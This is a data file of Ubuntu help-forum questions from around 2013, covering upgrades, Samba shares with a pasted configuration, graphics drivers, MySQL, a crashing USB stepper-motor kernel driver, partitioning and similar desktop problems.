399517	issues from upgrading one version at a time ?	i 've been using 12.04 since it came out , never changed due to stability , but i do fear that i am missing a lot of stuff and new software in the newest versions . my idea was to upgrade to 14.04 when it pops out , from lts to lts , but i feel that i ca n't wait . is there any issue from upgrading from 12.04 to 12.10 , 13.04 and then 13.10 ? i remember that when upgrading windows vista to seven , instead of doing a clean install of windows seven , would make the windows heavier on resources , and quite slow in general . so , what are the risks of upgrading to the latest non lts release instead of doing a clean install ? are there performance issues ? loss of personal data ?
399518	guake terminal hiding on altgr - ca n't type pipes	today my guake terminal started acting up in a way i have n't seen before - every time i press altgr ( which on my swedish keyboard is the right alt , right next to spacebar on the right-hand side ) the terminal looses focus and hides . on my swedish keyboard this is extremely inconvenient , since altgr is used to type pipes ( | ) ... i did install some updates which required a restart of my system today , but iirc that was only ubuntu base and nothing else . i do n't know for certain if this behavior was present before the update - since the popup came up when i started my system , i did n't do much work before i installed them and rebooted . i also took a look in the guake preferences to see if there was anything fishy with the keyboard shortcuts , but altgr is n't used at all , and all other shortcuts work as expected . altgr works normally in other context , such as an actual terminal window ( opened e.g . by pressing ctrl+alt+t ) or typing here in chromium . what could have caused this ? how do i troubleshoot and/or fix it ?
399522	install ubuntu on windows 8.1	can i install ubuntu on a windows 8.1 computer ? that computer is the one i currently use .
399528	ca n't access shared folder on win2k machine	i 'm trying to access a shared folder on my win2k machine from ubuntu 12 . i 'm somewhat new to ubuntu so bear with me . i 've setup the workgroup on the windows machine , added a user name and password to it for the ubuntu machine and gave permissions . on the ubuntu machine , when i try and connect to the network folders , i can see the computer and see all of the folders within , but when i try and open the shared folder , it asks me for username , password and workgroup info . i type it in , and submit , only to be asked again , again and again . what am i missing ?
399530	how do i install geforce gtx 660 in 13.10	just bought a geforce gtx 660 and replaced my radeon hd 5870 ( it finally died after 3 years ) . i 'm having terrible problems getting the video card to work . as i only had command line options so far i 've ran : ( purged fglrx* ) then sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 and then i started getting low graphics mode errors . did some searching on my tablet , and i tried several things but what finally worked better was : sudo apt-get install bumblebee bumblebee-nvidia however now that i 'm logged into my computer finally , i have no access to terminal , no access to the top bar , and hitting super key does nothing , alt-f2 does nothing , and i only can post because i tried running wow and it had an error and the error report opened a link . all i can see on my desktop is my wallpaper and desktop icons . i can ctrl+alt+f1 , and navigate to the downloaded official nvidia driver , however that wo n't run because of x-server , and i ca n't run it from my desktop . can anyone help me ?
399534	lost windows partitions after attempting ubuntu install	i am having a serious problem : i have a windows 7 machine . i created an unallocated partition via windows so i can use it to install ubuntu . i restarted using ubuntu live usb . in the partition manager for ubuntu , i chose the unallocated space so it can install ubuntu . there were 4 partitions , one which was fat32 and it had the hp boot files and recovery . i assigned an ext4 and / location to the unallocated space and somehow it bundled it with my hardware boot files . i decided to abort the installation and reboot the system to keep it as it was . windows now prompts me to start in safe mode , and the windows system starts and then the whole thing crashes with the windows bluescreen and reboots . same thing keeps repeating . so : i booted up using the ubuntu 12.04 usb to make sure i backup my life onto an external hard disk . i mean this is my taxes and work files that are critical . i began copying the folders - and one of them is 150 gb . it began copying fine , but then the screen went black . the hard disk is still churning , both the internal and the external ones have their lights flashing so i am assuming it 's still copying as it takes about 2 hours . however , now i ca n't wake up the monitor by moving the mouse or anything . i tried ctrl-alt-f1 then ctrl-alt-f7 but to no avail . i am really worried about my files . i had already unplugged a usb drive during copy and it was corrupted because of ntfs issues and i ca n't really mount it on a different machine either . i am totally stuck . any advice ? i have looked at all the questions and none of them was helpful for my particular problem . thanks , charles p.s . : i cant install testdisk on live either . tried that to get the original partitions back : (
399535	not able to access samba shares but visible in network	in windows it asks for username & password & in ubuntu it asks for username , domain & password . i entered root 's and local user 's password it says not accessible . # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = test netbios name = bishwa # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses name resolve order = wins lmhosts host bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # domain logons = yes domain master = yes ; local master = yes preferred master = yes os level = 64 # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) logon drive = h : ; logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username [ homes ] comment = home directories browseable = no writable = yes # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) [ netlogon ] comment = network logon service path = /home/samba/netlogon guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on [ profiles ] comment = users profiles path = /home/samba/profiles ; guest ok = no browseable = no create mask = 0600 directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ mail ] path = /home/frigate/mail writable = yes browseable = yes [ thunderbird ] path = /home/frigate/desktop/thunderbird writable = yes browseable = yes
399536	wine 1.7.9 and mono package	one day i installed wine 1.7.8 with mono and any game ( also steam games ) were working great . few days ago my linux broke completely so i had to reinstall it , then i updated nvidia drivers and wine like this : sudo apt-get install wine1.7 then i released that the new version ( 1.7.9 ) installed automatically but without mono package anymore . until now all the wine games ca n't run due to fact it can not find my graphic card drivers . what can i do in this case ? i 'm a ubuntu noob btw .
399537	mysql script does not stop , reboots mysql	i have installed ubuntu 13.10 desktop x64 on my laptop . after the installation i installed mysql server sudo apt-get install mysql-server mysql-client installation wass successful but i noticed the following issues with mysql . using sudo service mysql start and sudo service mysql stop the database starts and stops correctly . but when i use sudo /etc/init.d/mysql stop the database service stops and than it gets spawn again automatically without any user input . using ps -a | grep mysql i noticed that the spawn gets a new pid . have you noticed this issue with mysql . for the same reason mysqladmin -u root -p shutdown does the same thing as sudo /etc/init.d/mysql stop i need to use mysqladmin -u root -p shutdown command as i would like to integrate mysql with netbeans 7.4 i would appreciate your help .
399540	how to setting up xerox docuprint m205 b on ubuntu 13.10 64bit	just bought the printer with scanner ( copier ) capability . having trouble on setting up the printer/scanner . tried to setup with brother hl 2030 ( http : //ubuntuforums.org/showthread.php ? t=273489 & p=1854278 # post1854278 ) and , with xerox p8e driver ( http : //blog.simonrumble.com/fuji-xerox-docuprint-203a-on-ubuntu-linux ) end up with 016-502 error . the printer come with windows and mac drivers . found http : //www.fujixeroxprinters.com.au/en/downloads.aspx ? product=8058 & category=5726 & os=32768 & dl=1 downloaded , but does not know how to do with it yet . please help . thank you
399541	installing ms office 2003	which wine version is suitable for installing ms office 2003 in ubuntu 12.04 , i tried to install ms office 2003 , and 2007 but i faced problem even i tried with wine , playonlinux but there was problem to install , please rectify my problems
399544	when switching to a higher resolution get badly readable text	i 've got a display that should be able to handle 2560*1600 ( lenovo thinkvision 3053 ) and a rather recent nvidia card ( geforce 780 ) . the hardware should be able to support this resolution but i ca n't seem to get a clear and crisp image and readable text on my desktop on higher resolutions . all is well on 1920*1080 , but as soon as i go to 1600*1200 or 2560*1600 or 1920*1600 it goes wrong . it does n't have anything to do with the form factor ( for example , i have no issues 1680*1050 , which is a 16:10 as well ) . i tried to increase the text scaling factor with gnome tweak tool , but that only helps a little . i am running 13.10 and gnome 3.10 , nvidia drivers 319 . i first thought that it had something to do with hi dpi and allegedly the 3.10 version should solve this , but it has n't . anybody an idea why this could be ? and maybe even what i could do to fix it . or has it really got something to do with the hi dpi thing and should i wait a little longer for a next version of gnome ? kasper
399545	boot from dvd takes too long	it takes over 15 minutes to boot from two dvd 's that i burned from two different downloads - desktop - from the unbuntu web site using infrarecorder . then when i use the mouse to try to start something there is a time lag making any progress impossible . i get virtually no response from clicks of the mouse . can you help me fix this ? i was able to use bodhi linux on a live usb with no problems . i would be very grateful for a fix . i am using the 32 bit ubuntu .
399550	differant user-name at terminal	i have normal wubi instillation did not change any sitting . but now i find user-name at terminal that is different from user account appears at the top right corner . i need to make / change what at the terminal to be just as user-account.image of user-name at terminal 1 : strong text
399552	how to create a deb package for a python3 script ?	i have one python file , main.py . i would like to be able to make a .deb package from it , and then be able to run main.py by typing the package name from the terminal . it is written in python 3 , so the package name should run : python3 main.py the only dependency i know of is python3 . i have tried creating a deb with a dependency of python3 , and then running python3 packagename , but i get : /usr/bin/python3 : ca n't find '__main__ ' module in 'packagename' trying to use debreate for package creation fails to open with : traceback ( most recent call last ) : file `` /usr/bin/debreate '' , line 12 , in < module > import wx , sys , os , debreate , db , language , shutil file `` /usr/share/debreate/debreate.py '' , line 23 , in < module > import os , sys , wx.lib.dialogs , db , webbrowser , language , shutil , subprocess file `` /usr/share/debreate/db.py '' , line 5 , in < module > import wx , wx.combo , wx.lib.mixins.listctrl as lc , os , sys , language importerror : no module named combo
399557	hbo and ted talks video maximizes on wrong monitor	i want to stream videos from my laptop to my tv through an hdmi cable that i have bought . i 'm using ubuntu 12.04 . while i have been able to do this for youtube videos , i have n't for others like hbo and ted talks . the reason is that when i maximize it to full screen , the video gets maximized on my laptop monitor . does someone know how to fix this ? notice that what i mean with maximization is not about the window , but about the video which i want to watch . thanks a bunch .
399558	how do i install 32-bit packages on 64-bit ubuntu ?	i am using the 64-bit version of ubuntu , but i need to install a 32-bit version of a package to use with a proprietary extension for it , which is only available in 32-bit . how can i install the 32-bit version of the package , while i am running a 64-bit system ?
399566	usb device driver - calling device_write function from kthread	i 'm writing a simple usb driver to drive a stepper motor based on usb skeleton 2.2 driver , kernel 3.8 . the basic version is running properly . as a advancement , i introduced kthread to call the device_write ( skel_write ) ( ) , so that the driver will be available for other tasks & requests . calling procedure : user ( request ) - > device_ioctl - > kthread - > device_write . in this scenario , when i call the device_write multiple times from kthread through a loop then after some calls kernel gets messed up , upon seeing the log file , the error is : dec 30 01:15:14 mit kernel : [ 962.316843 ] device_write ( efed1180,2,10 ) , ioused : 1 dec 30 01:15:14 mit kernel : [ 962.316900 ] data : 0 , motor_cnt : 2 , master_counter : 20 dec 30 01:15:14 mit kernel : [ 962.366498 ] data : 1 , motor_cnt : 2 , master_counter : 21 dec 30 01:15:14 mit kernel : [ 962.416116 ] write over , going for sleep dec 30 01:15:14 mit kernel : [ 962.416125 ] file : efed1180 , data : 2 , i : 11 dec 30 01:15:14 mit kernel : [ 962.416128 ] device_write ( efed1180,2,10 ) , ioused : 1 dec 30 01:15:14 mit kernel : [ 962.416166 ] bug : unable to handle kernel null pointer dereference at ( null ) dec 30 01:15:14 mit kernel : [ 962.416254 ] ip : [ ] skel_write+0xd7/0x360 [ usbstep ] dec 30 01:15:14 mit kernel : [ 962.416294 ] *pdpt = 0000000000000000 *pde = f0002accf0002acc dec 30 01:15:14 mit kernel : [ 962.416332 ] oops : 0000 [ # 1 ] smp dec 30 01:15:14 mit kernel : [ 962.416363 ] modules linked in : usbstep ( of ) parport_pc ( f ) ppdev ( f ) bnep rfcomm bluetooth snd_hda_codec_hdmi uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev snd_hda_codec_idt coretemp snd_hda_intel kvm snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) joydev ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) snd_rawmidi ( f ) hp_wmi lib80211_crypt_tkip snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) sparse_keymap radeon wl ( pof ) lib80211 ttm drm_kms_helper cfg80211 drm hp_accel lis3lv02d mei input_polldev wmi i2c_algo_bit video ( f ) intel_ips mac_hid snd ( f ) lpc_ich soundcore ( f ) microcode ( f ) lp ( f ) parport ( f ) psmouse ( f ) serio_raw ( f ) r8169 ahci ( f ) libahci ( f ) [ last unloaded : usbstep ] dec 30 01:15:14 mit kernel : [ 962.416866 ] pid : 2997 , comm : mitesh tainted : pf o 3.8.0-26-generic # 38-ubuntu hewlett-packard hp probook 4520s/1411 dec 30 01:15:14 mit kernel : [ 962.416928 ] eip : 0060 : [ ] eflags : 00010287 cpu : 2 dec 30 01:15:14 mit kernel : [ 962.416960 ] eip is at skel_write+0xd7/0x360 [ usbstep ] dec 30 01:15:14 mit kernel : [ 962.416989 ] eax : f0665b84 ebx : 00000014 ecx : 000000d0 edx : 00000014 dec 30 01:15:14 mit kernel : [ 962.417024 ] esi : f0665b40 edi : 00000000 ebp : efddbf40 esp : efddbf04 dec 30 01:15:14 mit kernel : [ 962.417059 ] ds : 007b es : 007b fs : 00d8 gs : 00e0 ss : 0068 dec 30 01:15:14 mit kernel : [ 962.417089 ] cr0 : 8005003b cr2 : 00000000 cr3 : 019d1000 cr4 : 000007f0 dec 30 01:15:14 mit kernel : [ 962.417124 ] dr0 : 00000000 dr1 : 00000000 dr2 : 00000000 dr3 : 00000000 dec 30 01:15:14 mit kernel : [ 962.417158 ] dr6 : ffff0ff0 dr7 : 00000400 dec 30 01:15:14 mit kernel : [ 962.417181 ] process mitesh ( pid : 2997 , ti=efdda000 task=f0bed9b0 task.ti=efdda000 ) dec 30 01:15:14 mit kernel : [ 962.417223 ] stack : dec 30 01:15:14 mit kernel : [ 962.417236 ] f0665b84 efddbf58 efddbf58 0000000a 00000001 efddbf58 00000000 efddbf40 dec 30 01:15:14 mit kernel : [ 962.417301 ] c1609d81 00000002 f06c5d40 00000014 0000000c efddbf58 f1487408 efddbf6c dec 30 01:15:14 mit kernel : [ 962.417398 ] f8585546 00000000 efed1180 efddbf58 0000000b f6eb0032 aa092dff f6eb7ebc dec 30 01:15:14 mit kernel : [ 962.417475 ] call trace : dec 30 01:15:14 mit kernel : [ 962.417504 ] [ ] ? printk+0x4d/0x4f dec 30 01:15:14 mit kernel : [ 962.417559 ] [ ] tele+0x86/0xc0 [ usbstep ] dec 30 01:15:14 mit kernel : [ 962.417618 ] [ ] ? skel_write+0x360/0x360 [ usbstep ] dec 30 01:15:14 mit kernel : [ 962.417691 ] [ ] kthread+0x94/0xa0 dec 30 01:15:14 mit kernel : [ 962.417744 ] [ ] ? __hrtimer_start_range_ns+0x2e0/0x460 dec 30 01:15:14 mit kernel : [ 962.417819 ] [ ] ret_from_kernel_thread+0x1b/0x28 dec 30 01:15:14 mit kernel : [ 962.417886 ] [ ] ? kthread_create_on_node+0xc0/0xc0 dec 30 01:15:14 mit kernel : [ 962.417951 ] code : c0 89 c6 0f 84 83 01 00 00 83 c3 0a b8 00 0e 00 00 81 fb 00 0e 00 00 b9 d0 00 00 00 0f 46 c3 89 45 f0 8d 46 44 8b 55 f0 89 04 24 < 8b > 07 e8 52 9f ee c8 85 c0 89 45 e4 0f 84 0f 01 00 00 8d 47 54 dec 30 01:15:14 mit kernel : [ 962.418433 ] eip : [ ] skel_write+0xd7/0x360 [ usbstep ] ss : esp 0068 : efddbf04 dec 30 01:15:14 mit kernel : [ 962.418530 ] cr2 : 0000000000000000 dec 30 01:15:14 mit kernel : [ 962.433930 ] -- - [ end trace 63245eeeb64414aa ] -- - here goes the code : kthread int tele ( void *__tele_data ) { struct tele_data *tele_data = __tele_data ; int i=0 ; char *dptr=null ; char numb [ 4 ] ; sprintf ( numb , '' % d '' , tele_data- > num ) ; dptr=numb ; for ( i=0 ; i < 30 ; i++ ) { is_ioctl_used=1 ; printk ( `` file : % p , data : % s , i : % d\n '' , tele_data- > file , dptr , i ) ; skel_write ( tele_data- > file , ( char * ) dptr , 10 , 0 ) ; printk ( `` write over , going for sleep\n '' ) ; } return 0 ; } device_write - static ssize_t skel_write ( struct file *file , const char *user_buffer , size_t count , loff_t *ppos ) { struct usb_skel *dev ; int retval = 0 , i = 0 , motor_count , dir=0 ; struct urb *urb = null ; char *buf = null ; char *buf1 = null ; size_t writesize = min ( count+10 , ( size_t ) max_transfer ) ; printk ( kern_info `` device_write ( % p , % s , % d ) , ioused : % d\n '' , file , user_buffer , count , is_ioctl_used ) ; dev = file- > private_data ; // verify that we actually have some data to write if ( count == 0 ) goto exit ; /* * limit the number of urbs in flight to stop a user from using up all * ram */ if ( ! ( file- > f_flags & o_nonblock ) ) { if ( down_interruptible ( & dev- > limit_sem ) ) { retval = -erestartsys ; goto exit ; } } else { if ( down_trylock ( & dev- > limit_sem ) ) { retval = -eagain ; goto exit ; } } spin_lock_irq ( & dev- > err_lock ) ; retval = dev- > errors ; if ( retval < 0 ) { // any error is reported once dev- > errors = 0 ; // to preserve notifications about reset retval = ( retval == -epipe ) ? retval : -eio ; } spin_unlock_irq ( & dev- > err_lock ) ; if ( retval < 0 ) goto error ; /* create a urb , and a buffer for it , and copy the data to the urb */ buf1= ( char * ) kmalloc ( sizeof ( char ) *20 , gfp_kernel ) ; //allocate 2nd buffer . if ( is_ioctl_used ) { //whether the write function is called from ioctl or directly ( echo > /dev/stepper ) sprintf ( buf1 , user_buffer ) ; } else { if ( copy_from_user ( buf1 , user_buffer , count ) ) { retval = -efault ; goto error ; } } motor_count=simple_strtol ( buf1 , null,10 ) ; if ( motor_count < 0 ) { //rotation counts of stepper motor . motor_count=motor_count * -1 ; //if motor_count < 0 then rotate in anti-clock direction . dir=1 ; } urb = usb_alloc_urb ( 0 , gfp_kernel ) ; if ( ! urb ) { retval = -enomem ; goto error ; } buf = usb_alloc_coherent ( dev- > udev , writesize , gfp_kernel , & urb- > transfer_dma ) ; if ( ! buf ) { retval = -enomem ; goto error ; } /* this lock makes sure we do n't submit urbs to gone devices */ mutex_lock ( & dev- > io_mutex ) ; if ( ! dev- > interface ) { /* disconnect ( ) was called */ mutex_unlock ( & dev- > io_mutex ) ; retval = -enodev ; goto error ; } /* initialize the urb properly */ usb_fill_int_urb ( urb , dev- > udev , usb_sndintpipe ( dev- > udev , dev- > bulk_out_endpointaddr ) , buf , writesize , skel_write_bulk_callback , dev , dev- > binterval ) ; urb- > transfer_flags |= urb_no_transfer_dma_map ; usb_anchor_urb ( urb , & dev- > submitted ) ; for ( i=0 ; i < motor_count ; i++ ) { //loop to rotate motor based on counts . printk ( `` data : % d , motor_cnt : % d , master_counter : % d\n '' , ptr- > data , motor_count , master_counter ) ; if ( dir==0 ) ptr=ptr- > next ; else ptr=ptr- > prev ; // fill the buffers . buf [ 0 ] =0x01 ; buf [ 1 ] =0 ; buf [ 2 ] =ptr- > data ; /* send the data out the bulk port */ retval = usb_submit_urb ( urb , gfp_kernel ) ; if ( retval ) { dev_err ( & dev- > interface- > dev , `` % s - failed submitting write urb , error % d\n '' , __func__ , retval ) ; mutex_unlock ( & dev- > io_mutex ) ; goto error_unanchor ; } if ( ++master_counter & & master_counter > 47 ) master_counter=0 ; /* * release our reference to this urb , the usb core will eventually free * it entirely */ mdelay ( 50 ) ; //delay is required to match with motor speed. } mutex_unlock ( & dev- > io_mutex ) ; usb_free_coherent ( dev- > udev , writesize , buf , urb- > transfer_dma ) ; kfree ( buf1 ) ; usb_free_urb ( urb ) ; is_ioctl_used=0 ; return writesize ; error_unanchor : usb_unanchor_urb ( urb ) ; error : if ( urb ) { usb_free_coherent ( dev- > udev , writesize , buf , urb- > transfer_dma ) ; usb_free_urb ( urb ) ; } up ( & dev- > limit_sem ) ; exit : return retval ; } i 'm new to kernel programming and might be missing something .
399567	ubuntu not installing/booting on a fresh computer	i just built my new computer and i do n't have enough money for windows 7 yet , so i wanted to install ubuntu to start out with . i burned 13.10 to a disk and put it into my computer and that did n't work , so then i put 12.04.3 onto a flash drive , booted my computer with that and it still did n't work . unfortunately , i was using a blank dvd-r so i erased the ubuntu 13.10 without knowing that i could not put it back on to the blank dvd . so the only version of ubuntu i still physically have is 12.04.3 that is on my flash drive . if anyone could help me that would be much appreciated ! ! ! !
399569	how to get ubuntu 's `` normal '' style/theme on lubuntu desktop ?	i installed lubuntu on top of my ubuntu install via apt-get install lubuntu-desktop . i can now launch lxde sessions regularly , but the look of the applications follows the gtk standard theme . how can i get lxde applications to use ubuntu 's `` normal '' theme ? ( i.e. , white text on dark grey background , ubuntu fonts , etc . -- not sure what the theme name is now . )
399572	create list from my text	i use either notepad++ or pspad -i have a text file some lines begin with 1. some with 2 . i would like to create a list of all lines starting with 1 to copy-any ideas ?
399574	what is the simplest way for me to upgrade from quantal to saucy ?	what is the simplest way for me to upgrade from quantal to saucy ? what i tried : $ sudo do-release-upgrade what it returned : checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1,135 kb ] fetched 1,135 kb in 0s ( 0 b/s ) authenticate 'saucy.tar.gz ' against 'saucy.tar.gz.gpg ' extracting 'saucy.tar.gz' reading cache checking package manager can not upgrade an upgrade from 'quantal ' to 'saucy ' is not supported with this tool .
399578	compiz closed in error w/ unity plugin off , system disabled	i was trying to do the 3d cube , but i toggled the ubuntu unity plugin off , so my ubuntu would n't crash . then i accedentally closed compiz . i ca n't do anyhthing . help ?
399580	mysql creating problems	i recently tried to install my sql but it still does not show up in search and after this installation ( which is a complete failure i am not able to install or un instal anything and my computer has also started lagging . ( 13.10 )
399581	how do i browse nokia lumia 610 files ?	nokia lumia 610 gets mounted but when i try to open the internal storage , it shows the following message : sorry , could not display all the contents of “storage” : libmtp error : could not get object handles . installing libmtp or mtp applications from ubuntu software center is not solving the problem .
399585	processing clipboard text through a script in between copy and paste	i want to intercept the paste event and run any text through my script . use case is like this ( assume i have a script somewhere which accepts text on stdin and turns 'world ' into 'potato ' , writing on stdout ) . highlight some text 'hello world ! ' with the cursor middle-mouse click to paste from selection buffer , 'hello potato ! ' appears i do n't have anything malicious in mind , it 's just about autoformatting some source code when copying/pasting to/from internet . my question concerns the selection buffer ( middle-mouse clipboard ) but i guess the question applies to other clipboard text in general too .
399592	computer shutting down 5 minutes after starting a game	so after i start any game ( for example starbound or fez ) on my xubuntu installation , after 5 minutes my computer just shuts down without even displaying a warning . does anyone know what could be causing this and how it could be fixed ? thanks in advance .
399593	i can not open portable haddrive disk	i have maxtor blackarmor portable 320gb hard drive disk . when i plug that into my unbuntu os it pop with error dbus error org.gtk.private.remotevolumemonitor.notfound : the given volume was not found i couldnât able to unlock the portable hard drive disk any idea how can i open it ?
399597	software center shows “use this source” instead of “install”	i was downloading vlc media player . suddenly there was a network problem and it stopped . then when i tried to install it again it does not show the install option , but instead shows `` use this source '' .
399602	splitting one partition into three	i bought a new laptop which had ubuntu installed in it and now i want to install windows8 on it along side ubuntu with dual boot , so i need separate partitions for windows , ubuntu and my data . i want to split my 443.76gb drive in to three drives , one for win8 os and two equal size drives for data . but before that i dont know what drive does the ubuntu os is using for its files ( i guess the 3gb drive ) , should i increase its size ? will i be able to use the ubuntu os without any storage problems ? please help me in a but of detail as i am new to linux , ubuntu . here is the current state of my hd ... partition = /dev/sda1 , file system = fat 32 , mount point = , label = dell utility , size = 300mb , used = 4.12mb , flag = diag partition = /dev/sda2 , file system = fat 32 , mount point = , label = os , size = 3gb , used = 1.84gb , flag = lba partition = /dev/sda3 , file system = ext4 , mount point = / , label = , size = 454.71gb , used = 10.96gb , flag = boot partition = /dev/sda4 , file system = extented , mount point = , label = , size = 7.75gb , used = -- , flag = -- partition = /dev/sda5 , file system = linux-swap , mount point = , label = , size = 7.75gb , used = -- , flag = -- sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x12c561d1 